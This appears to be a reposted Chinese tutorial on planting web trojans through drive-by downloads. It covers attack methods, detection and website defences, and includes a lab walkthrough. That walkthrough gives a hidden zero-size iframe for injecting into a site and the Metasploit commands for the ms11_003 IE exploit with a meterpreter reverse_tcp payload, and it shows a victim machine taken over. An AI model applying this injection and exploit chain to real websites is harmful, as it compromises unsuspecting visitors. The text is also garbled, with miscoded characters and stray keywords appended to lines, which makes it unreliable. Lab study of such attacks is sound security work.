網站掛馬原理及實戰

約 5 分鐘
css


注:本文僅供學習參考

網頁掛馬簡介
網頁掛馬指的是把一個木馬程序上傳到一個網站裏面,而後用木馬生成器生成一個網馬,放到網頁空間裏面,再加代碼使得木馬在打開網頁時運行。html

網頁掛馬工做原理
做爲網頁掛馬的散佈者,其目的是將木馬下載到用戶本地並進一步執行,當木馬獲得執行後,就意味着會有更多的木馬被下載,且進一步被執行。這樣就進入一個惡性的循環,從而使用戶的電腦遭到攻擊和控制。爲達到目的首先要將木馬下載到本地。數據庫

常見方式windows

1將木馬假裝爲頁面元素,木馬則會被瀏覽器自動下載到本地。

2利用腳本運行的漏洞下載木馬。

3利用腳本運行的漏洞釋放隱含在網頁腳本中的木馬。

4將木馬假裝成缺失的組件,或和缺失的組件捆綁在一塊兒,如flash播放插件。這樣既達到了下載的目的,下載的組件又會被瀏覽器自動執行。

5經過腳本運行調用某些com組件,利用其漏洞下載木馬。

6在渲染頁面內容的過程當中,利用格式溢出釋放木馬,如ani格式溢出漏洞。

7在渲染頁面內容的過程當中,利用格式溢出下載木馬,如flash9.0.115播放漏洞。

檢測方式瀏覽器

1特徵匹配:將網頁掛馬的腳本按腳本病毒進行檢測,可是網頁腳本變形方式、加密方式比起傳統的PE格式病毒更爲多樣,檢測起來也更加困難。

2主動防護:當瀏覽器要進行某些動做時,做出提示,以下載了某插件的安裝包,會提示是否運行。好比瀏覽器建立暴風影音播放器時,提示是否容許運行,大多數狀況下用戶會點擊是,網頁木馬會所以獲得執行。

3檢查父進程是否爲瀏覽器,這種方法很容易被躲過且會對不少插件形成誤報。

網站掛馬實驗
準備win7實驗機和kali
kali ip地址爲10.1.1.101
1.將如下代碼插進咱們準備的網站中服務器

<iframe src=地址 width=0 height=0></iframe>

寬度高度都設爲0,這個地址就會變成透明,不查看源代碼的話是發現不了的
這裏的網馬地址設置爲http://10.1.1.101:8060/test.html當用戶訪問到咱們這個地址時,會自動訪問http://10.1.1.101:8060/test.html,木馬會被瀏覽下載到本地微信

2.利用ms11_003IE漏洞攻擊win7主機
執行命令app

use exploit/windows/browser/ ms11_003_ie_css_import’,選擇漏洞利用EXP
設置SRVPORT URIPATH與網馬中的src一致
set SRVPORT 8060
set URIPATH test.html
運行命令set payload windows/meterpreter/reverse_tcp 設置攻擊載荷進行回連
set lhost 10.1.1.101 設置回連的IP地址
set lport 1234設置回連端口號
show options
最後設置完看下圖

執行run命令
好戲上場
這時打開win7實驗機,打開IE,模擬受害者訪問http://10.1.1.101/index.html
tcp

在kali端成功看到受害者主機上線學習

成功使用sysinfo查看主機信息

使用Screenshot查看win7實驗機的屏幕截圖(win7待機了)

包括後面收集信息屬於後滲透環節,本文不作討論。

防護措施

1對開放上傳附件功能的網站,必定要進行身份認證,並只容許信任的人使用上傳程序。

2保證所使用的程序及時地更新。

3不要在前臺網頁加註後臺管理程序登陸頁面的連接。

4時常備份數據庫等文件,可是不要把備份數據放在程序默認的備份目錄下。

5管理員的用戶名和密碼要有必定複雜性。

6 IIS中禁止目錄的寫入和執行功能,能夠有效防止asp木馬。

7在服務器、虛擬主機控制面板設置執行權限選項中,將有上傳權限的目錄取消asp的運行權限。

8建立一個robots.txt上傳到網站根目錄,Robots可以有效防範利用搜索引擎竊取信息的駭客。




本文分享自微信公衆號 - 黑白天(li0981jing)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。

相關文章
相關標籤/搜索